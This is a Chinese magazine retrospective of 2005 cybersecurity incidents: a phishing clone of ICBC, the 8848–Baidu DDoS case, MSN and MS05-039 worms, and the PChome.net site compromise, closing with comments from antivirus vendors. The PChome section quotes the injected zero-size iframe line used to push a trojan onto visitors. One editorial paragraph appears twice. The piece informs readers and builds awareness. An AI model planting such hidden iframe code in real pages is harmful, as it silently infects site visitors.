2005网络安全大事件
特别策划
现代社会进步,网络已经是社会不可分割的一部分。特别是互联网进入WEB2.0时代后,更多的人加入了互联网。在网上消费,使用网络银行等行为逐渐成为人们的习惯。网络安全关系重大,已经是众多网民所关注的事情。我们回顾2005年网络安全大事件,总结经验,以提高我们的网络安全水平。聊天软件、多媒体文件、网站、操作系统是我们都要使用到的。下面我们将分析这4项和我们息息相关的IT产品在2005年的安全形势,并通过评星等级来说明它的易受攻击程度,即星越多,该产品的安全性越低。
2005网络安全“突发区”等级评估
聊天软件
被称为互联网第三里程碑的即时通讯软件,在今年可真算得上是流年不利了。首先在年初,就出现了通过MSN传播的“性感鸡”病毒,紧接着MSN又暴出PNG 处理中的漏洞可能允许远程执行代码,通过这个漏洞可以进行恶意程序的传播;国内的QQ也没有好到哪去。从火爆的“超级女声”到刚刚推出的奥运吉祥物,都被利用进行攻击。通过QQ传播的木马病毒有增多的趋势,安全形式不容乐观。
易受攻击程度:★★★★★ 危险
媒体文件
各种各样的媒体文件也是层出不穷、百花齐放。可就在今年,Real Net works公司以及微软公司的多媒体文件相继暴出高危漏洞,黑客可以利用这些漏洞进行网页木马的大肆传播。由于这两家公司的多媒体文件已经成为网络上最常用的多媒体文件类型之一,再加上BT下载、P2P等文件传播方式的类型,给网络用户造成了极大的安全隐患。
易受攻击程度:★★★ 较危险
网站
网站浏览是用户上网最常见的一种方式,所以网站自身是否安全会给用户带来各种不同的结果。在现在这个网页木马横飞,挂马大行其道的时期,一些知名网站的安全性还是非常好的。虽然出现了像“PChome网站”被挂马的事件,但毕竟只是个案。总的来说,今年网站的安全性还是比较好的。
易受攻击程度:★★☆ 较安全
Windows系统
Windows操作系统是大多电脑用户每天都必须接触的,在经历了2003年“冲击波”病毒及2004年“震荡波”病毒那样大规模爆发的蠕虫病毒后,微软公司在今年缩短了系统漏洞的修补时间。虽然也出现了像MS05-039这样的高危漏洞,但毕竟没有造成恶劣的后果。所以说今年的系统安全还是比较令人满意的。
易受攻击程度:★★ 较安全
事件一:网络钓鱼乔装银行,众网友自动上钩
事件发生时间:2005年1月
事件主角:网上假银行
事件损失:约80万元人民币
2005年1月,一个假冒中国工商银行网站出现在互联网上,诱骗银行卡持有人的账户和密码,并导致多人的银行存款被盗,直接经济损失达800000元人民币。事发后,引起各大银行的重视,中行、工行、农行等多家银行均迅速在其网站上发表“敬告客户”、“安全提示”的信息,提示其网上银行客户登录合法网址。“网络钓鱼”作为一种网络诈骗的新手段,出现在国人面前。
在中国,“网络钓鱼”暂时还没有造成过多的损失,但随着宽带网络进一步普及,用户将面临更多的线上交易安全风险。2004年,国家计算机网络应急技术处理协调中心共接到网络仿冒报告223起,仿冒对象主要是金融网站和电子商务网站。而在2002年和2003年,每年只有一起,同比增加了上百倍。2005年,假冒网站数量将进一步增加。
“网络钓鱼”这种攻击方式利用欺骗性的电子邮件、手机短信、以及伪造的Web站点等来进行诈骗活动,欺骗者通常会找一个看似正当的理由。例如:提示你为了保证你的银行卡安全,要求你在线更改你的信用卡密码,然后将用户引诱至某个著名企业的假冒网站。这些假冒的网站域名与企业真正的网址非常相近,如假冒中国工商银行域名是www.1cbc.com.cn,与中国工商银行网站www.icbc.com.cn,也只是“1”和“i”一字之差。
在假冒网站的首页通常会有一个仿冒的密码输入框,提示你输入账户和密码,然后将用户输入的内容通过邮件等方式发给欺骗者。受骗者往往会泄露自己的财务数据,如信用卡号、账户用户名、口令等内容。“网络钓鱼”这种攻击方式最大的特点是不需要主动攻击,欺骗者只需要静静等候上当的“鱼儿”就可以了。
编辑观点:网上交易已经是大家相当熟悉的交易方式了,网上交易的安全性是整个网上交易的重心。可是今年频频发生的假冒网上银行、银行卡短信欺诈事件让人们在感到互联网带来的便捷的时候,也感受到它极大的风险性。好在现在国家立法对网上交易进行规范,相信随着法规的不断完善和人们安全意识的提高,“网上钓鱼”这种欺骗手段终将消失。
事件二:8848遭到DDoS攻击,怀疑是被百度攻击
事件发生时间:2005年1月21日
事件主角: 8848和百度
事件损失:经济损失1500万元人民币
2005年1月21日18点,8848发现首页遭到攻击;1月21日22点,8848技术人员发现网站遭到DDoS攻击,发起攻击的IP地址全部来自百度搜索联盟成员。经过8848技术人员分析后,发现百度通过技术手段,在其联盟成员毫不知情的情况下,在其服务器上加入一段iframe代码,在其搜索条中嵌入了一个隐藏帧(代码为width=0 height=0 frameborder=0即将该帧的大小设置为0),造成用户访问搜索条时会同时访问两次8848首页,即8848.com和8848.net网站。剧增的访问量最终造成服务器拒绝服务,网站26小时内无法访问。当天,8848向北京市公安局网监处报案,开始立案调查。
23日,百度发表声明,称没有接到来自任何网站的有关攻击的投诉,也没有发现任何员工或部门与此事有关联,百度与此事无关。随后,百度和8848相继发表声明,互相指责与质疑,一场口水大战在媒体的关注中不断升级。在经历了将近一年的时间后,12月1日上午,北京市第一中级人民法院对这起全国首例网络攻击案进行了一审宣判。法院以8848提供的证据不具有特定性、排他性、唯一性,不能证明百度实施了涉案攻击行为为由,一审判决驳回了8848的诉讼请求。
8848作为国内知名的电子商务网站,据说恶性攻击给公司带来了巨大损失。通常网站每天有1000万到1500万的独立IP的访问量;网站平台有10万家网店,被攻击后平台不能用,估计每天有300到500万元甚至更多损失;由于8848自己的销售代理都使用公司网络平台,恶意攻击导致网站的销售已停滞,代理商无法提单;更大的损失还在于用户不良感受,很可能导致很多不明真相的用户流失,也可能导致不明真相的合作伙伴的信任危机;此外,由于8848还提供在线支付系统,在被攻击的同时产生的订单很可以无法持续,货与款无法同步,也就是导致短时期的交易混乱。
DDoS是英文Distribut ed Denial of Service的缩写,中文意思是“分布式拒绝服务”。DDoS攻击主要是通过很多“傀儡主机”向远程计算机发送大量看似合法的数据包,从而造成网络阻塞或服务器资源耗尽而导致拒绝服务。分布式拒绝服务攻击一旦被实施,攻击数据包就会犹如洪水般涌向远程计算机,从而把合法的数据包淹没,导致合法用户无法正常访问服务器的网络资源。因此,分布式拒绝服务也被称之为“洪水攻击”。这种攻击主要有三种方式,即SYN/ACK Flood攻击、TCP全连接攻击、以及提交脚本攻击。如果按照8848声明中的提法,这次的DDoS应该是采用了“提交脚本攻击”这种方式。因为当用户访问了含有iframe代码的网页后,就会在浏览器中自动访问iframe代码中设置的其他网页链接。利用iframe代码进行网页跳转,也是现在网页挂木马常常使用的一种方法。
编辑观点:今年年初的这件事件曝光后,立即吸引了媒体和网友的关注,这次事件之所以引人注目,主要是当事双方都是互联网中知名的企业。另外,“DDoS”这个词语的出现也极大地吸引了媒体和用户的眼球。这起被称为“全国首例网络攻击案”的事件在经历了一年以后,法院最终还了百度一个清白。希望中国的互联网企业以后能够多一分务实,少一分炒作。
事件三:“性感鸡”袭击MSN,众多用户电脑变“肉鸡”
事件发生时间:2005年2月3日
事件主角:“性感鸡”病毒、MSN用户
事件损失:约60万元人民币
2005年2月3日,很多使用微软即时通讯工具MSN的用户都出现异常的现象。当他们接收一个好友发送的文件并运行后,随即弹出一张会弹出一只性感烧鸡的图片,同时机器运行十分缓慢,这就是春节期间闹得沸沸扬扬,被称为鸡年第一毒的“性感鸡”病毒。
MSN“性感鸡”病毒通过利用应用广泛的即时通信工具MSN作为传播途径,病毒运行后,弹出一张有一只性感烧鸡的图片,同时在后台向所有MSN在线好友发送“罗伯特”后门病毒的最新变种winhost.exe,如此反复,传播速度非常快速。“罗伯特”病毒家族及其近亲Backdoor/Agobot家族可以使用户系统被黑客完全控制,成为“僵尸电脑”。并能够通过多种系统漏洞和弱口令传播,感染能力极强。此后在极短的时间内,连续出现多个病毒变种。病毒变种可以利用P2P软件增大传播面积。中止大量反病毒软件的进程、系统工具和用于反病毒的工具软件,导致系统安全性大大降低。修改Hosts文件,将知名反病毒软件的升级地址重定向到MSN的首页,如果病毒大面积爆发,可能引发对MSN英文首页的DoS(拒绝服务式)攻击。
“性感鸡”病毒发作后两天之内,据国家计算机病毒应急中心统计,感染人数已超过万人,病毒爆发的规模仅次于去年五一期间的“震荡波”病毒。“性感鸡”病毒之所以能迅速地进行传播,是因为该病毒综合利用了多种传播途径,所以被称为2005年第一毒。
编辑观点:现在提供各种各样的即时通讯工具进行交流已经成为一种新的形式,它们的流行虽然给用户的工作和生活都带来了很多的便捷,但各种各样的问题也接踵而至,比如木马、病毒、广告等等都已经盯上了它们,所以无论在何时何地,用户都要提高警惕,将这些“不好的东西”统统拦在系统之外。
事件四:微软再暴漏洞,狙击波袭击网络
事件发生时间:2005年8月15日
事件主角:微软Windows操作系统
事件损失:约100万元人民币
2005年8月15日,一种利用微软“即插即用服务代码执行漏洞”(MS05-039)的蠕虫病毒在全球范围内传播开来。该病毒利用最新漏洞传播,并且可以通过IRC接受黑客命令,使被感染计算机被黑客完全控制。这就是被称之为危害直逼冲击波的“狙击波”病毒。
“狙击波”病毒发作后,首先会在系统目录下生成一个botzor.exe,并在注册表的启动项中添加该项目。接着修改%SystemDir%\drivers\etc\hosts文件,屏蔽大量国外反病毒和安全厂商的网址。然后通过TCP端口8080连接IRC服务器,接受并执行黑客命令,从而导致被感染计算机由黑客完全控制。并且同时在TCP端口33333开启FTP服务,提供病毒文件下载功能。
如果漏洞利用代码成功运行,将导致远程目标计算机从当前被感染计算机的FTP服务上下载病毒程序。如果漏洞代码没有成功运行,未打补丁的远程计算机可能会出现services.exe进程崩溃的现象。
“狙击波”病毒能在全球范围内造成这么大的影响,主要是利用了微软刚刚发布的“即插即用服务代码执行漏洞”。造成该漏洞的主要原因是即插即用服务中未经检查的缓冲区,成功利用此漏洞的攻击者可以完全控制受影响的系统。在 Windows 2000上,匿名攻击者可能试图远程利用此漏洞,在 Windows XP SP1上,只有经身份验证的用户可以试图远程利用此漏洞。在Windows XP SP2 和 Windows Server 2003上,只有管理员才能远程访问受影响的组件。因此,在Windows XP SP2 和 Windows Server 2003上,严格来说这个漏洞只能是一个本地特权提升漏洞,匿名用户不能试图远程利用此漏洞。由于漏洞的局限,使得“狙击波”病毒主要攻击的是Windows 2000操作系统,在传播上有了很大的局限性,从而使病毒并没有造成像冲击波、震荡波病毒这样大的危害。如果病毒在编写时加入了破解系统密码的功能,那么它所产生的危害将会更大。
编辑观点:互联网在经历了2003年的冲击波、2004年的震荡波的“重创”之后,狙击波病毒出现在世人面前,但是防病毒厂商的即时行动和用户安全意识的提高使得狙击波病毒并没有造成像冲击波、震荡波那样严重的危害。病毒过去以后,我们回想这次经过,发现它的出现又和微软Windows系统的一个高危漏洞有关,所以说这些病毒的出现软件公司也负一定的责任。但作为用户本身一定要提高自己的安全意识,决不能放松警惕,给病毒可乘之机。编辑观点:互联网在经历了2003年的冲击波、2004年的震荡波的“重创”之后,狙击波病毒出现在世人面前,但是防病毒厂商的即时行动和用户安全意识的提高使得狙击波病毒并没有造成像冲击波、震荡波那样严重的危害。病毒过去以后,我们回想这次经过,发现它的出现又和微软Windows系统的一个高危漏洞有关,所以说这些病毒的出现软件公司也负一定的责任。但作为用户本身一定要提高自己的安全意识,决不能放松警惕,给病毒可乘之机。
事件五:PChome.net遭遇黑客入侵,多个病毒借机传播
事件发生时间:2005年10月13日
事件主角:PChome网站
事件损失:众多电脑感染木马病毒
2005年10月13日,当有的用户登录到国内知名的IT资讯互联网站PChome.net时,遭到病毒攻击。后经过反病毒工程师的分析后得出结论:PChome.net网站遭到黑客入侵,部分网页被植入网页木马,给网民的信息安全带来威胁。经过分析后发现,黑客已经成功改变了PChome.net多个网页,除了直接向点击相关网页的用户传播盗取“热血江湖”玩家信息的木马病毒外,还同时在“www.pchome.net/hping/css/css.css”这个网页文件的尾部植入恶意代码,使用户自动跳转到一个恶意网页,该网页可以自动下载臭名昭著的“QQ阿拉大盗”的服务端程序,直接威胁用户QQ使用的信息安全。并于当日将恶意代码和病毒程序进行了清除。次日,当人们再次登录PChome.net时,再次发现网站被植入了恶意代码。
像PChome.net这样知名的网站在很短的时间里,连续被黑客植入恶意代码和病毒程序,说明其服务器存在某个不为管理员所知的漏洞。这样当管理员修复了相关页面后,黑客继续入侵并再次修改了页面内容。黑客第一次将恶意代码添加到“http://www.pchome.net/hping/css/css.css”文件的尾部,第二次则是在“http://www.pchome.net/main/js/main.js ”这个文件里,植入了恶意Java iframe框架代码,代码为“<br/>docu ment.writeln("<iframe src="http:\/\/www.pchome.net\/ads\/css\/c.htm" width="0" height="0" frameborder="0"><\/iframe>");”。我们可以清楚地从这段代码中看到“iframe”这个参数,当人们访问“http://www.pchome.net/main/js/main.js ”这个文件的时候,浏览器就会自动地跳转到还有病毒程序的网页。
编辑观点:黑客为了能使自己的手中拥有大量可以控制的“肉鸡”,在入侵了完网站后,常常会在一些网页文件中加入一段恶意代码,这就是常说的“挂马”。以前都是一些小型的网站或论坛被黑客挂马,可当PChome.net这样大型的网站都被黑客挂了马,还有什么不可能的呢?虽然这只是今年的一个“个案”,但是从一个侧面也提醒用户以后上网要格外小心才是。
各大安全厂商总结今年网络安全形势
王耀华
北京瑞星科技股份有限公司研发部总经理
与去年相比,用户在2005年面临的网络安全状况有了很大的不同,传统的电脑病毒已经让位于利益驱动的、全方位的“网络威胁”,盗号木马、僵尸网络(BotNet)、流氓软件等频繁成为黑客攻击和不法分子获取经济利益的工具。并且,这个趋势在未来一段时间会变得更加明显,这就要求整个行业采用新的产品策略对抗“网络威胁”、全方位保护用户信息安全。
齐军
趋势科技网络安全专家
2005年,恶意程序的目标现在并不只有计算机,有些恶意程序已进化到能感染行动装置,甚至包含了某些 MP3 播放器。IM 蠕虫相继涌出,极有可能是恶性程序原始代码被公开导致。但总的来说,2005年的安全形势较之去年好了很多。
陶新宇
江民科技总经理
今年病毒的出现数量以及变种的速度,都远远超过去年。相较于去年,今年蠕虫病毒的危害开始降低,木马病毒开始占居主流地位,病毒作者的动机也由原来的玄耀技术转向牟取经济利益。通过入侵网站种植木马的事件明显增多。
陈睿
金山公司金山毒霸事业部技术总监
传统的破坏型病毒逐渐被以利益作为需求点的新网络威胁所代替。我们归纳了本年度网络威胁的特征,主要体现在以下四个方面:
一、间谍软件危害超过电脑病毒危害,成为中国网民最大的网络威胁;
二、网络钓鱼事件频出,增长势头有增无减;
三、漏洞被发现和漏洞病毒出现的时间间隔越来越短;
四、病毒传播方式和途径更加多样化、更加隐蔽;
郭训平
赛门铁克公司中国区技术经理
互联网威胁的形势正在转变。攻击者正从网络外围设备上的大规模多目标攻击向针对客户端目标的规模更小、更集中的攻击转移。同时,机密信息的暴露也呈增长趋势。